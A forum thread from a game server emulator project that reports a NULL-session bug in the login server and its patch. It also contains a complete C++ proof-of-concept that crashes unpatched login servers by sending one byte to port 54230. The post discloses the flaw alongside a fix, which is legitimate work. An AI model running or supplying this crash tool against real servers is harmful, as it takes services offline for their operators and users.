Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 8:29 am
by atom0s
Bug Report: http://bugs.dspt.info/show_bug.cgi?id=429

Bug is a result of the login server checking for NULL sessions then attempting to create a session out of the connection. However the check is for a specific packet in the login process which leaves the null session allowed to fall through into the underlying code.

To fix, a second check for NULL after the first handling will prevent the problem from happening.

Small / simple patch to fix the problem.
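A minimal model of the fall-through described in this report, added here as an illustration and not code from the DSP source: the dispatch, opcode values and function names are assumptions, but the shape of the bug and of the fix (a second NULL check after the login handling) follows the description above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical session model; the real DSP session type is not on the page. */
typedef struct { int account_id; } session_t;

/* Constructed opcodes: only PKT_LOGIN is allowed to create a session.
 * 0x00 matches the single byte the proof-of-concept in this thread sends. */
enum { PKT_OTHER = 0x00, PKT_LOGIN = 0x10 };

/* Outcomes for the model. DEREF_NULL marks the spot where the real handler
 * would dereference a NULL session and crash the process. */
enum { DEREF_NULL = -1, DROP = 0, HANDLED = 1 };

static session_t g_session;              /* stand-in for the session pool */

static session_t *create_session(uint8_t opcode) {
    return opcode == PKT_LOGIN ? &g_session : NULL;
}

/* Before the fix: the NULL check is tied to one specific packet, so any other
 * opcode arriving on a fresh connection reaches the handler with sd == NULL. */
static int dispatch_before(session_t *sd, uint8_t opcode) {
    if (sd == NULL && opcode == PKT_LOGIN) {
        sd = create_session(opcode);
        if (sd == NULL) return DROP;
    }
    if (sd == NULL) return DEREF_NULL;   /* sd->account_id would fault here */
    return HANDLED;
}

/* After the fix: the session is re-checked after the login handling, so a
 * NULL session is dropped before any code touches it, whatever the opcode. */
static int dispatch_after(session_t *sd, uint8_t opcode) {
    if (sd == NULL && opcode == PKT_LOGIN) {
        sd = create_session(opcode);
    }
    if (sd == NULL) return DROP;         /* the added second NULL check */
    return HANDLED;
}

int main(void) {
    printf("before fix, opcode 0x00 on NULL session: %d (-1 = crash)\n",
           dispatch_before(NULL, PKT_OTHER));
    printf("after fix,  opcode 0x00 on NULL session: %d (0 = dropped)\n",
           dispatch_after(NULL, PKT_OTHER));
    return 0;
}
```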

Re: Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 9:02 am
by atom0s
Just as a heads up, this patch is also fixing an exploit that can be abused to crash the login server easily.
Here is a proof of concept that can abuse this to crash the login server, prior to this patch being applied:

/**
 * DSP Crash Proof-of-Concept
 * (c) 2012-2013 atom0s [atom0s@live.com]
 *
 * dspcrash_0002!atom0s -- Login server crash exploit.
 *
 */

#pragma comment( lib, "Ws2_32.lib" )
#include <WinSock2.h>
#include <Windows.h>
#include <iostream>

int __cdecl main( int argc, char* argv[] )
{
    std::cout << "========================================================" << std::endl;
    std::cout << "[ DSP Crash Proof-of-Concept (Login Server Crash) ]" << std::endl;
    std::cout << "[ by atom0s (c) 2013 ]" << std::endl;
    std::cout << "========================================================" << std::endl;

    // Validate we have two arguments..
    if (argc < 2)
    {
        std::cout << "[!] Invalid argument count!" << std::endl;
        std::cout << "[!] dspcrash_0002!atom0s.exe [ip_address]" << std::endl;
        return 0;
    }

    // Initialize winsock..
    WSADATA wsaData = { 0 };
    if (WSAStartup( MAKEWORD( 2, 2 ), &wsaData ))
    {
        std::cout << "[!] Failed to initialize Winsock!" << std::endl;
        return ERROR_SUCCESS;
    }
    std::cout << "[!] Winsock initialized!" << std::endl;

    // Create the socket..
    auto sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
    if (sock == INVALID_SOCKET) // socket() returns INVALID_SOCKET on failure, not NULL
    {
        std::cout << "[!] Failed to create socket." << std::endl;
        WSACleanup();
        return ERROR_SUCCESS;
    }
    std::cout << "[!] Socket created!" << std::endl;

    // Prepare socket..
    struct sockaddr_in saddr    = { 0 };
    memset( &saddr, 0x00, sizeof( sockaddr_in ) );
    saddr.sin_addr.S_un.S_addr  = inet_addr( argv[1] );
    saddr.sin_family            = AF_INET;
    saddr.sin_port              = htons( 54230 );

    // Connect to the target..
    if (connect( sock, (struct sockaddr*)&saddr, sizeof( saddr ) ))
    {
        std::cout << "[!] Failed to connect to target server!" << std::endl;
        closesocket( sock );
        WSACleanup();
        return ERROR_SUCCESS;
    }

    // Send the exploit packet..
    unsigned char packet[] = { 0x00, 0x00 };
    if (send( sock, (const char*)packet, 1, 0 ) != 1)
    {
        std::cout << "[!] Failed to send exploit packet!" << std::endl;
        closesocket( sock );
        WSACleanup();
        return ERROR_SUCCESS;
    }

    std::cout << "[!] Packet was sent to target server!" << std::endl;
    std::cout << "[!] Exploit complete!" << std::endl;

    // Cleanup and return..
    closesocket( sock );
    WSACleanup();

    // Suspend for visibility..
    if (argc == 3) Sleep( 5000 );

    return ERROR_SUCCESS;
}

Re: Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 9:15 am
by whasf
Committed r3508

thank you!